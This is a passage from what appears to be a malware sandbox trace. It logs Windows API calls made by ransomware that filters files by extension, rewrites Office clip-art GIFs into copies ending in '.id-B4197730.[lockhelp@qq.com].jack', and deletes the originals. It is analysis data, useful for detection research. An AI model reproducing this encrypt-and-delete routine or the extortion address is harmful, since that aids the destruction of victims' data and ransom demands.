(lpString1=".7z", lpString2="GIF") returned -1 [0207.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0207.688] lstrlenW (lpString=".dbf") returned 4 [0207.688] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0207.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0207.688] lstrlenW (lpString=".1cd") returned 4 [0207.688] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0207.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0207.688] lstrlenW (lpString=".jpg") returned 4 [0207.688] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0207.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0207.688] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0207.688] lstrlenW (lpString=".doc") returned 4 [0207.689] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0207.689] lstrlenW (lpString=".docx") returned 5 [0207.689] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0207.689] lstrlenW (lpString=".pdf") returned 4 [0207.689] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0207.689] lstrlenW (lpString=".xls") returned 4 [0207.689] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0207.689] lstrlenW (lpString=".xlsx") returned 5 [0207.689] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0207.689] lstrlenW (lpString=".ppt") returned 4 [0207.689] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0207.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0207.689] lstrlenW (lpString=".zip") returned 4 [0207.689] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0207.689] lstrlenW (lpString=".rar") returned 4 [0207.689] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0207.689] lstrlenW (lpString=".bz2") returned 4 [0207.689] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0207.689] lstrlenW (lpString=".7z") returned 3 [0207.689] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0207.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0207.689] lstrlenW (lpString=".dbf") returned 4 [0207.689] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0207.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0207.689] lstrlenW (lpString=".1cd") returned 4 [0207.689] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0207.689] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 68 [0207.689] lstrlenW (lpString=".jpg") returned 4 [0207.689] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0207.689] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0207.689] lstrlenW (lpString="AG00057_.GIF") returned 12 [0207.689] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0207.691] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=11891) returned 1 [0207.691] CloseHandle (hObject=0x3f4) returned 1 [0207.691] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif")) returned 0x220 [0207.691] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0207.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0207.691] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.691] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0207.691] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0207.692] GetLastError () returned 0x0 [0207.692] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x2e73, lpOverlapped=0x0) returned 1 [0208.516] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x2e80, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x2e80, lpOverlapped=0x0) returned 1 [0208.517] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0208.517] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xec, lpOverlapped=0x0) returned 1 [0208.517] SetEndOfFile (hFile=0x418) returned 1 [0208.780] CloseHandle (hObject=0x418) returned 1 [0208.821] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.821] SetEndOfFile (hFile=0x3f4) returned 1 [0208.822] CloseHandle (hObject=0x3f4) returned 1 [0208.822] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0208.822] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00057_.gif")) returned 1 [0208.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0208.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0208.823] lstrlenW (lpString=".doc") returned 4 [0208.823] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0208.823] lstrlenW (lpString=".docx") returned 5 [0208.823] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0208.823] lstrlenW (lpString=".pdf") returned 4 [0208.823] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0208.823] lstrlenW (lpString=".xls") returned 4 [0208.823] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0208.823] lstrlenW (lpString=".xlsx") returned 5 [0208.823] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0208.823] lstrlenW (lpString=".ppt") returned 4 [0208.823] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0208.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0208.823] lstrlenW (lpString=".zip") returned 4 [0208.823] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0208.823] lstrlenW (lpString=".rar") returned 4 [0208.823] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0208.823] lstrlenW (lpString=".bz2") returned 4 [0208.823] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0208.823] lstrlenW (lpString=".7z") returned 3 [0208.823] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0208.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0208.824] lstrlenW (lpString=".dbf") returned 4 [0208.824] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0208.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0208.824] lstrlenW (lpString=".1cd") returned 4 [0208.824] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0208.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0208.824] lstrlenW (lpString=".jpg") returned 4 [0208.824] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0208.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0208.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0208.824] lstrlenW (lpString=".doc") returned 4 [0208.824] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0208.824] lstrlenW (lpString=".docx") returned 5 [0208.824] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0208.824] lstrlenW (lpString=".pdf") returned 4 [0208.824] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0208.824] lstrlenW (lpString=".xls") returned 4 [0208.824] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0208.824] lstrlenW (lpString=".xlsx") returned 5 [0208.824] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0208.824] lstrlenW (lpString=".ppt") returned 4 [0208.824] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0208.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0208.824] lstrlenW (lpString=".zip") returned 4 [0208.824] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0208.824] lstrlenW (lpString=".rar") returned 4 [0208.824] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0208.825] lstrlenW (lpString=".bz2") returned 4 [0208.825] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0208.825] lstrlenW (lpString=".7z") returned 3 [0208.825] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0208.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0208.825] lstrlenW (lpString=".dbf") returned 4 [0208.825] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0208.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0208.825] lstrlenW (lpString=".1cd") returned 4 [0208.825] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0208.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00057_.GIF") returned 68 [0208.825] lstrlenW (lpString=".jpg") returned 4 [0208.825] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0208.825] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0208.825] lstrlenW (lpString="AG00103_.GIF") returned 12 [0208.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0208.826] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=12702) returned 1 [0208.826] CloseHandle (hObject=0x3f4) returned 1 [0208.826] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif")) returned 0x220 [0208.826] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0208.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0208.826] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.826] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0208.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0208.827] GetLastError () returned 0x0 [0208.827] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x319e, lpOverlapped=0x0) returned 1 [0209.060] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x31a0, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x31a0, lpOverlapped=0x0) returned 1 [0209.439] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0209.440] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xec, lpOverlapped=0x0) returned 1 [0209.440] SetEndOfFile (hFile=0x418) returned 1 [0209.440] CloseHandle (hObject=0x418) returned 1 [0209.441] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.441] SetEndOfFile (hFile=0x3f4) returned 1 [0209.442] CloseHandle (hObject=0x3f4) returned 1 [0209.443] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0209.443] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00103_.gif")) returned 1 [0209.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0209.443] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0209.443] lstrlenW (lpString=".doc") returned 4 [0209.443] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.443] lstrlenW (lpString=".docx") returned 5 [0209.443] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.443] lstrlenW (lpString=".pdf") returned 4 [0209.443] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.443] lstrlenW (lpString=".xls") returned 4 [0209.444] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.444] lstrlenW (lpString=".xlsx") returned 5 [0209.444] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.444] lstrlenW (lpString=".ppt") returned 4 [0209.444] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0209.444] lstrlenW (lpString=".zip") returned 4 [0209.444] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.444] lstrlenW (lpString=".rar") returned 4 [0209.444] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.444] lstrlenW (lpString=".bz2") returned 4 [0209.444] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.444] lstrlenW (lpString=".7z") returned 3 [0209.444] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0209.444] lstrlenW (lpString=".dbf") returned 4 [0209.444] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0209.444] lstrlenW (lpString=".1cd") returned 4 [0209.444] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0209.444] lstrlenW (lpString=".jpg") returned 4 [0209.444] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0209.444] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0209.444] lstrlenW (lpString=".doc") returned 4 [0209.444] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.445] lstrlenW (lpString=".docx") returned 5 [0209.445] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.445] lstrlenW (lpString=".pdf") returned 4 [0209.445] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.445] lstrlenW (lpString=".xls") returned 4 [0209.445] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.445] lstrlenW (lpString=".xlsx") returned 5 [0209.445] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.445] lstrlenW (lpString=".ppt") returned 4 [0209.445] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0209.445] lstrlenW (lpString=".zip") returned 4 [0209.445] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.445] lstrlenW (lpString=".rar") returned 4 [0209.445] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.445] lstrlenW (lpString=".bz2") returned 4 [0209.445] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.445] lstrlenW (lpString=".7z") returned 3 [0209.445] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0209.445] lstrlenW (lpString=".dbf") returned 4 [0209.445] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0209.445] lstrlenW (lpString=".1cd") returned 4 [0209.445] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0209.445] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00103_.GIF") returned 68 [0209.445] lstrlenW (lpString=".jpg") returned 4 [0209.445] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0209.446] lstrcmpiW (lpString1=".GIF", lpString2=".jack") returned -1 [0209.446] lstrlenW (lpString="AG00129_.GIF") returned 12 [0209.446] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0209.446] GetFileSizeEx (in: hFile=0x3f4, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=12482) returned 1 [0209.446] CloseHandle (hObject=0x3f4) returned 1 [0209.446] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif")) returned 0x220 [0209.446] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f4 [0209.447] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.447] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.447] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0209.447] GetLastError () returned 0x0 [0209.447] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x30c2, lpOverlapped=0x0) returned 1 [0209.603] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x30d0, lpOverlapped=0x0) returned 1 [0209.604] ReadFile (in: hFile=0x3f4, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0209.604] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xec, lpOverlapped=0x0) returned 1 [0209.604] SetEndOfFile (hFile=0x418) returned 1 [0209.604] CloseHandle (hObject=0x418) returned 1 [0209.605] SetFilePointerEx (in: hFile=0x3f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.605] SetEndOfFile (hFile=0x3f4) returned 1 [0209.606] CloseHandle (hObject=0x3f4) returned 1 [0209.606] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0209.606] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00129_.gif")) returned 1 [0209.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0209.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0209.606] lstrlenW (lpString=".doc") returned 4 [0209.607] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0209.607] lstrlenW (lpString=".docx") returned 5 [0209.607] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0209.607] lstrlenW (lpString=".pdf") returned 4 [0209.607] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0209.607] lstrlenW (lpString=".xls") returned 4 [0209.607] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0209.607] lstrlenW (lpString=".xlsx") returned 5 [0209.607] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0209.607] lstrlenW (lpString=".ppt") returned 4 [0209.607] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0209.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0209.607] lstrlenW (lpString=".zip") returned 4 [0209.607] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0209.607] lstrlenW (lpString=".rar") returned 4 [0209.607] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0209.607] lstrlenW (lpString=".bz2") returned 4 [0209.607] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0209.607] lstrlenW (lpString=".7z") returned 3 [0209.607] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0209.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0209.607] lstrlenW (lpString=".dbf") returned 4 [0209.607] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0209.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 68 [0209.607] lstrlenW (lpString=".1cd") returned 4 [0209.607] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 